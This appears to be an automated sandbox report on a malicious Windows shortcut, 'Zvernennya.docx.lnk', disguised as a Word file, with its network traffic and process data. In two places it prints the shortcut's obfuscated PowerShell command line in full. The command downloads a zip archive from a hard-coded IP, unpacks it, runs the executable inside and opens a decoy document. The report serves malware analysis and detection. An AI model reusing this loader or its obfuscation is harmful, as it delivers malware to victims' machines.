                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qsfwjcfu.j3h.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rlfyneix.r2m.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rtxng1he.2pv.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tcqmcy4i.uxp.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_unl4t4l1.itx.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xoqd0hdy.jmr.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9275ff4d83007384.customDestinations-ms (copy)

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):5422
                                            Entropy (8bit):3.522270259155854
                                            Encrypted:false
                                            SSDEEP:48:60rM4qS8MsdCZZGXu/dZZwk0wJcglzAqSogZo0E0wJcglIAqSogZog1:vrM4gMEub0wJcgIHe0wJcgpHX
                                            MD5:7FAEC4680D5C2C07EB2CA9266EE3D6E7
                                            SHA1:CFD1CBCA872378B14682059BAA13859E33D17B09
                                            SHA-256:29F578C6379C7304A794C11498B8E5F742CFA849901134018E4C02F609AB7EA4
                                            SHA-512:8739C03B32997F36641B954F58DADD5A6DFB8A6AC41E7F94CCFB6293B82FD260F9166242AA938283996B69E54439FE5A4222D72A29E920712FF864AFD2DAE946
                                            Malicious:false
                                            Preview:...................................FL..................F.`.. .......c....7.....f.\....\8...........................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O......z...c...%........t.2.\8...Z&1 .ZVERNE~1.LNK..X......gZ.j.Z&1...........................E..Z.v.e.r.n.e.n.n.y.a...d.o.c.x...l.n.k.......Z...............-.......Y............7......C:\Users\user\Desktop\Zvernennya.docx.lnk..B.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.W.O.R.D.I.C.O.N...e.x.e.........%ProgramFiles(x86)%\Microsoft Office\root\Office16\WORDICON.exe.....................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.W.O.R.D.I.C.O.N...e.x.e.........................................................................

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GXWD0HK9U3FKFUK1E9SG.temp

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):5422
                                            Entropy (8bit):3.522270259155854
                                            Encrypted:false
                                            SSDEEP:48:60rM4qS8MsdCZZGXu/dZZwk0wJcglzAqSogZo0E0wJcglIAqSogZog1:vrM4gMEub0wJcgIHe0wJcgpHX
                                            MD5:7FAEC4680D5C2C07EB2CA9266EE3D6E7
                                            SHA1:CFD1CBCA872378B14682059BAA13859E33D17B09
                                            SHA-256:29F578C6379C7304A794C11498B8E5F742CFA849901134018E4C02F609AB7EA4
                                            SHA-512:8739C03B32997F36641B954F58DADD5A6DFB8A6AC41E7F94CCFB6293B82FD260F9166242AA938283996B69E54439FE5A4222D72A29E920712FF864AFD2DAE946
                                            Malicious:false
                                            Preview:...................................FL..................F.`.. .......c....7.....f.\....\8...........................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O......z...c...%........t.2.\8...Z&1 .ZVERNE~1.LNK..X......gZ.j.Z&1...........................E..Z.v.e.r.n.e.n.n.y.a...d.o.c.x...l.n.k.......Z...............-.......Y............7......C:\Users\user\Desktop\Zvernennya.docx.lnk..B.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.W.O.R.D.I.C.O.N...e.x.e.........%ProgramFiles(x86)%\Microsoft Office\root\Office16\WORDICON.exe.....................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.W.O.R.D.I.C.O.N...e.x.e.........................................................................

                                            Static File Info

                                            General

                                            File type:MS Windows shortcut, Item id list present, Has Description string, Has Working directory, Has command line arguments, Icon number=1, ctime=Fri Apr 11 09:32:56 2025, mtime=Fri Apr 11 09:32:56 2025, atime=Fri Apr 11 09:32:56 2025, length=0, window=hidenormalshowminimized
                                            Entropy (8bit):1.0434790355427517
                                            TrID:
                                            • Windows Shortcut (20020/1) 100.00%
                                            File name:Zvernennya.docx.lnk
                                            File size:14'428 bytes
                                            MD5:88d8bac9ebead23483eedb46bff67a83
                                            SHA1:2935064aad64a6940805d1118a8e084a3882680b
                                            SHA256:4fd5ac728d23e19fe64b0c873c94b4daee4ad157a5b5036b22b04cd456ef970f
                                            SHA512:1430cb76ee87760fdf49c0ecd176834f0881322f77c926b37582e5d997699303c25a3e64b602236aaed8efe52cae5fda1040e9c660c42ca69a783d7cbb546eee
                                            SSDEEP:48:8l++JsmfAP8SlRNvfItvi+tap1OMdNy7agB8ZssNv+OMdN5yK/CAmhcJhAWCdCZZ:8I+JsmfuXNItv5aa5J8ZfNHKC9hYh1
                                            TLSH:7852871063FA0A18F2B37B3459BAA655487B7DDEAA33CB5D0718C10D4966A00DCA6F32
                                            File Content Preview:L..................F..........~.......~.......~..................................P.O. .:i.....+00.../C:\...................<.1..@...Z. ..Windows.&........Ol`.Z.l....W.i.n.d.o.w.s.....@.1......Z.!..System32..(........Ol`.Z.l....S.y.s.t.e.m.3.2.....Z.1.....

                                            File Icon

                                            Icon Hash:74f4e4c4cac9c1cd

                                            Static Windows Shortcut Info

                                            General

                                            Relative Path:
                                            Command Line Argument:-win 1 eChO DtavXKBKfXVHqPXRVEuVIPLEyxSPHoKFBlIKjiiHsEhnHhR; if (-not(Test-Path 'avast.z''i''p' -PathType Leaf)){&(Get-Command in???e-webr**) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/avast.z''i''p -OutFile avast.z''i''p}; sleep 0.01; Measure-Object | Out-Null; eChO WTnawPfENZdkUENXjlpINcyhdJtkYBSFpQNIqOuHamGgTznPhaVGDmHoIdoX; $Hehe = 'Expand-Archive -Path avast.z''i''p -DestinationPath x64Updtr'; iex -Debug -Verbose -ErrorVariable $e -InformationAction Ignore -WarningAction Inquire $Hehe; eChO lvSVUDxPGUqlwAOwXchHhjWJyKnZkqyOSU; $NotHehe = 'st''ar''t x64Updtr/ABSchedhlp.e''x''e'; eChO KidSuyVnxDkSBubVQlNVHyDeH; iex -Debug -Verbose -ErrorVariable $ee -InformationAction Ignore -WarningAction Inquire $NotHehe; &(Get-Command in???e-webre************************) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/burka/Zvernennya.docx -OutFile Zvernennya.docx; sleep 0.01; Get-Process | Out-Null; eChO QVBlejalZjCInUcBtMAu; st''ar''t Zvernennya.docx; eChO dTOInNAdpCKpmsUNxuyyLqhNOnFFBzxsunUEmOanDJdYffeqTLBGSlOFcVSC
                                            Icon location:C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.exe

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2025-04-15T08:09:18.316758+02001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.549692146.185.239.1080TCP
                                            2025-04-15T08:09:19.519887+02001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.549692146.185.239.1080TCP
                                            2025-04-15T08:09:19.519887+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549692146.185.239.1080TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Apr 15, 2025 08:09:17.835783958 CEST4969280192.168.2.5146.185.239.10
                                            Apr 15, 2025 08:09:18.046953917 CEST8049692146.185.239.10192.168.2.5
                                            Apr 15, 2025 08:09:18.047060013 CEST4969280192.168.2.5146.185.239.10
                                            Apr 15, 2025 08:09:18.050637007 CEST4969280192.168.2.5146.185.239.10
                                            Apr 15, 2025 08:09:18.261219025 CEST8049692146.185.239.10192.168.2.5
                                            Apr 15, 2025 08:09:18.274374962 CEST8049692146.185.239.10192.168.2.5
                                            Apr 15, 2025 08:09:18.316757917 CEST4969280192.168.2.5146.185.239.10
                                            Apr 15, 2025 08:09:19.250422955 CEST4969280192.168.2.5146.185.239.10
                                            Apr 15, 2025 08:09:19.467995882 CEST8049692146.185.239.10192.168.2.5
                                            Apr 15, 2025 08:09:19.519886971 CEST4969280192.168.2.5146.185.239.10
                                            Apr 15, 2025 08:09:19.644354105 CEST4969280192.168.2.5146.185.239.10

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Apr 15, 2025 08:09:09.139791012 CEST6299853192.168.2.51.1.1.1
                                            Apr 15, 2025 08:09:09.289836884 CEST53629981.1.1.1192.168.2.5

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Apr 15, 2025 08:09:09.139791012 CEST192.168.2.51.1.1.10x281cStandard query (0)c.pki.googA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Apr 15, 2025 08:09:08.545023918 CEST1.1.1.1192.168.2.50x551eNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                            Apr 15, 2025 08:09:08.545023918 CEST1.1.1.1192.168.2.50x551eNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                            Apr 15, 2025 08:09:09.289836884 CEST1.1.1.1192.168.2.50x281cNo error (0)c.pki.googpki-goog.l.google.comCNAME (Canonical name)IN (0x0001)false
                                            Apr 15, 2025 08:09:09.289836884 CEST1.1.1.1192.168.2.50x281cNo error (0)pki-goog.l.google.com108.177.122.94A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • 146.185.239.10

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.549692146.185.239.10807484C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 15, 2025 08:09:18.050637007 CEST168OUTGET /avast.zip HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: 146.185.239.10
                                            Connection: Keep-Alive
                                            Apr 15, 2025 08:09:18.274374962 CEST496INHTTP/1.1 403 Forbidden
                                            Date: Tue, 15 Apr 2025 06:09:18 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Content-Length: 279
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 36 2e 31 38 35 2e 32 33 39 2e 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 146.185.239.10 Port 80</address></body></html>
                                            Apr 15, 2025 08:09:19.250422955 CEST156OUTGET /burka/Zvernennya.docx HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: 146.185.239.10
                                            Apr 15, 2025 08:09:19.467995882 CEST440INHTTP/1.1 403 Forbidden
                                            Date: Tue, 15 Apr 2025 06:09:19 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Content-Length: 279
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 36 2e 31 38 35 2e 32 33 39 2e 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 146.185.239.10 Port 80</address></body></html>


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:02:09:11
                                            Start date:15/04/2025
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 eChO DtavXKBKfXVHqPXRVEuVIPLEyxSPHoKFBlIKjiiHsEhnHhR; if (-not(Test-Path 'avast.z''i''p' -PathType Leaf)){&(Get-Command in???e-webr**) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/avast.z''i''p -OutFile avast.z''i''p}; sleep 0.01; Measure-Object | Out-Null; eChO WTnawPfENZdkUENXjlpINcyhdJtkYBSFpQNIqOuHamGgTznPhaVGDmHoIdoX; $Hehe = 'Expand-Archive -Path avast.z''i''p -DestinationPath x64Updtr'; iex -Debug -Verbose -ErrorVariable $e -InformationAction Ignore -WarningAction Inquire $Hehe; eChO lvSVUDxPGUqlwAOwXchHhjWJyKnZkqyOSU; $NotHehe = 'st''ar''t x64Updtr/ABSchedhlp.e''x''e'; eChO KidSuyVnxDkSBubVQlNVHyDeH; iex -Debug -Verbose -ErrorVariable $ee -InformationAction Ignore -WarningAction Inquire $NotHehe; &(Get-Command in???e-webre************************) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/burka/Zvernennya.docx -OutFile Zvernennya.docx; sleep 0.01; Get-Process | Out-Null; eChO QVBlejalZjCInUcBtMAu; st''ar''t Zvernennya.docx; eChO dTOInNAdpCKpmsUNxuyyLqhNOnFFBzxsunUEmOanDJdYffeqTLBGSlOFcVSC
                                            Imagebase:0x7ff7785e0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:1
                                            Start time:02:09:11
                                            Start date:15/04/2025
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7e2000000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Executed Functions

                                              Function 00007FF7C7CB37F5 Relevance: .4, Instructions: 423COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1461639525.00007FF7C7CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7CB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c7cb0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3527b71e611617aaf3c544353f9cd67faf62f6f996acd8d6fc1e7eb63be20cd6
                                              • Instruction ID: 73eca35d58bdea4935b1f209d1cceee788fc5c7021acf0fd3f32ce9c2a23ab03
                                              • Opcode Fuzzy Hash: 3527b71e611617aaf3c544353f9cd67faf62f6f996acd8d6fc1e7eb63be20cd6
                                              • Instruction Fuzzy Hash: E5D14631E0DA8B4FE765AF6848551B9BBE5FF06360B5801FED45DC7093DE28A806C361
                                              Function 00007FF7C7CB385C Relevance: .2, Instructions: 232COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1461639525.00007FF7C7CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7CB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c7cb0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bfd73d7aa18e1f8da3deea0c7207a2677701e83f95fd5b686c8e07f9221ca1e6
                                              • Instruction ID: 83aacd796f193a07808e35a58031c6f6523f2881f5d5b3e791ea4aa2d450f457
                                              • Opcode Fuzzy Hash: bfd73d7aa18e1f8da3deea0c7207a2677701e83f95fd5b686c8e07f9221ca1e6
                                              • Instruction Fuzzy Hash: D571E321E0DA8B4FE7A5EF684854275FAA1EF05350B9801FED51DCB183DE29AC068361
                                              Function 00007FF7C7BEBD6F Relevance: .2, Instructions: 205COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1460831182.00007FF7C7BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7BE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c7be0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c30bed38179510c18105e42fe78b3a59af598d05b5d7bd447ab00a7f0f96371a
                                              • Instruction ID: 9fac86417c2b7c493b905ccf6af3cd420834b84dff230eabe37ececef0d36685
                                              • Opcode Fuzzy Hash: c30bed38179510c18105e42fe78b3a59af598d05b5d7bd447ab00a7f0f96371a
                                              • Instruction Fuzzy Hash: 53616031D08A5C8FEBA4EF689855BE9B7F1FF55310F4081AAC04DD3292DE34A986CB41
                                              Function 00007FF7C7BE3475 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1460831182.00007FF7C7BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7BE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c7be0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                              • Instruction ID: e1e5323ef09e5a15357945a057fe6b059e86057022d237d3b65704aa54942184
                                              • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                              • Instruction Fuzzy Hash: 4001677111CB0C4FDB44EF0CE451AA5B7E0FB99364F50056EE58AC3695DA36E882CB46

                                              Non-executed Functions

                                              Function 00007FF7C7BE55FA Relevance: 1.6, Strings: 1, Instructions: 375COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1460831182.00007FF7C7BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7BE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c7be0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: O_^
                                              • API String ID: 0-3781818083
                                              • Opcode ID: 1745a507a23f1252f700c726638d5c44a1d12e9f6f23e64ab7359c2d8f57d0ec
                                              • Instruction ID: 601a7b44324a5f1d6f3b97c7b1d32a9bc28aaa234533095b63fee488b2d31824
                                              • Opcode Fuzzy Hash: 1745a507a23f1252f700c726638d5c44a1d12e9f6f23e64ab7359c2d8f57d0ec
                                              • Instruction Fuzzy Hash: 5B913F5BB1D56206B51237AF78851EDAB44CFCA3B6B884677F24CC91838C88788E42F5
                                              Function 00007FF7C7BE9B48 Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1460831182.00007FF7C7BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7BE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c7be0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8
                                              • API String ID: 0-4194326291
                                              • Opcode ID: 35b10c220e23fadb25418e74fa19d549318bf80bdff6dd82469c1a6e2edc5286
                                              • Instruction ID: d1e6c0244ffb1e2e2646658f94a7973bdc872f09c27461cadec9af75b5f2de63
                                              • Opcode Fuzzy Hash: 35b10c220e23fadb25418e74fa19d549318bf80bdff6dd82469c1a6e2edc5286
                                              • Instruction Fuzzy Hash: 0851D8A420EAC1AFD706873D5814314FFA5FFCA26130442FFC0964A49BC624B9BAC7D6
                                              Function 00007FF7C7BF03FA Relevance: 1.3, Instructions: 1277COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1460831182.00007FF7C7BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7BE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c7be0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 084b49471be82472030ea5952e9f98852b6a7e88dfaa6a01861955bec2d480a6
